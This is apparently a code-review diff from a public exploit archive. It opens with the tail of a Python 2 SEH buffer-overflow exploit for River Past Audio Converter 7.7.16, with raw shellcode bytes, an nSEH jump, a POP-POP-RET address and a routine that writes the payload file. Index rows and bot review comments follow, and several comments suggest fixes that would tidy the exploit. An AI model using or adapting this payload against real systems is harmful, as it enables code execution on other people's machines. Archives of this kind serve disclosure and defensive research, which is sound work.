shellcode += "\x03\x2b\x0b\xfe\xda\x71\xcd\xbb\x73\x09\xe8\xaa\x38"
|
||||
shellcode += "\x4d\x88\xee\xae\x1b\x9a\xec\xb8\x1b\x82\xec\xa8\x1e"
|
||||
shellcode += "\x9a\xd2\x87\x81\xf3\x3c\x01\x98\x45\x5a\xb0\x1b\x8a"
|
||||
shellcode += "\x45\xce\x25\xc4\x3d\xe3\x2d\x33\x6f\x45\xbd\x79\x18"
|
||||
shellcode += "\xa8\x25\x6a\x2f\x43\xd0\x33\x6f\xc2\x4b\xb0\xb0\x7e"
|
||||
shellcode += "\xb6\x2c\xcf\xfb\xf6\x8b\xa9\x8c\x22\xa6\xba\xad\xb2"
|
||||
shellcode += "\x19"
|
||||
|
||||
|
||||
padding="\x21"*280
|
||||
nseh = "\xEB\x12\x90\x90"
|
||||
seh = struct.pack('<L',0x10011977) # 10011977 # POP POP RET
|
||||
rest = "\x24" * (3000-len(padding)-len(shellcode)-4)
|
||||
nops = "\x90\x90\x90\x90"
|
||||
|
||||
payload = padding + nseh + seh + nops * 16 + shellcode + rest
|
||||
|
||||
try:
|
||||
f=open("carbonara.txt","w")
|
||||
print "[+] Creating %s bytes pasta payload.." %len(payload)
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print "[+] Carbonara created!"
|
||||
|
||||
except:
|
||||
print "Carbonara cannot be created"
|
|
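Review bot: the payload length arithmetic does not match its apparent intent: rest is sized as 3000-len(padding)-len(shellcode)-4, which accounts for padding, shellcode and nseh only, so the 4-byte seh and the 64 bytes from nops * 16 are never subtracted and the file written is 3068 bytes, not 3000; either subtract those terms or drop the fixed total. The script is Python 2 only (print statements without parentheses) but carries no shebang or note saying so, import socket is unused, the output file should be opened with "wb" since the payload is raw bytes, and the bare except: hides the real error when the file cannot be created. Step 1 says to run River_Past_Audio_Converter.py while the file is added as 46331.py, and step 3 spells the executable River_PastAudio_Converter.exe; align the names. Lastly, the seh line's comment "# 10011977 # POP POP RET" repeats the address without naming the module it belongs to, which is the detail that documents which component lacks SEH protections and needs fixing.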
@ -6298,6 +6298,7 @@ id,file,description,date,author,type,platform,port
|
|||
46314,exploits/windows/dos/46314.py,"TaskInfo 8.2.0.280 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
|
||||
46321,exploits/windows/dos/46321.py,"Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)",2019-02-05,"Victor Mondragón",dos,windows,
|
||||
46322,exploits/windows/dos/46322.py,"River Past Audio Converter 7.7.16 - Denial of Service (PoC)",2019-02-05,Achilles,dos,windows,
|
||||
46332,exploits/multiple/dos/46332.txt,"Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows",2019-02-06,"Google Security Research",dos,multiple,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
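Review bot: the new 46332 row types the Skia report as dos, while 46332.txt added in this commit describes a stack out-of-bounds write and, in its third variant, an out-of-bounds increment it calls an exploitation primitive, so dos understates the finding if the type column is meant to reflect impact. The description also carries no version or revision, unlike the neighbouring rows (e.g. "River Past Audio Converter 7.7.16"), and the affected and fixed Skia revisions are only implied by the rcl= values in the text file's links; put the affected revision in the description.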
@ -10279,6 +10280,7 @@ id,file,description,date,author,type,platform,port
|
|||
46288,exploits/windows/local/46288.py,"R 3.5.0 - Local Buffer Overflow (SEH)",2019-01-31,"Dino Covotsos",local,windows,
|
||||
46290,exploits/windows/local/46290.py,"UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)",2019-01-31,"Dino Covotsos",local,windows,
|
||||
46301,exploits/windows/local/46301.py,"PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit",2019-02-01,Achilles,local,windows,
|
||||
46331,exploits/windows/local/46331.py,"River Past Audio Converter 7.7.16 - Buffer Overflow (SEH)",2019-02-06,"Matteo Malvica",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
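Review bot: the 46331 row's description reads "River Past Audio Converter" while the title line inside 46331.py reads "River_Past_Audio_Converter"; align the two so searches match. The 46322 row in the first hunk is a DoS PoC for the same product and version dated the day before; cross-referencing it in the 46331 description (or in 46331.py) would make clear whether this entry is the same bug carried from crash to SEH overwrite or a separate issue.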
@ -40794,3 +40796,6 @@ id,file,description,date,author,type,platform,port
|
|||
46325,exploits/hardware/webapps/46325.txt,"devolo dLAN 550 duo+ Starter Kit - Remote Code Execution",2019-02-05,sm,webapps,hardware,
|
||||
46326,exploits/hardware/webapps/46326.html,"Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery",2019-02-05,"Yusuf Furkan",webapps,hardware,80
|
||||
46327,exploits/java/webapps/46327.txt,"OpenMRS Platform < 2.24.0 - Insecure Object Deserialization",2019-02-05,"Bishop Fox",webapps,java,
|
||||
46328,exploits/php/webapps/46328.txt,"osCommerce 2.3.4.1 - 'currency' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
|
||||
46329,exploits/php/webapps/46329.txt,"osCommerce 2.3.4.1 - 'products_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
|
||||
46330,exploits/php/webapps/46330.txt,"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
|
||||
|
|
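Review bot: the three osCommerce rows say "SQL Injection" while the titles inside 46328.txt, 46329.txt and 46330.txt say "SQL Vulnerabilities"; pick one wording. The rows also set port 80, whereas 46325 and 46327 in the same hunk leave the port empty for webapps findings and 46326 sets it; the advisories were tested on a local WAMP install and do not depend on a port, so whichever convention applies to webapps rows should be used consistently.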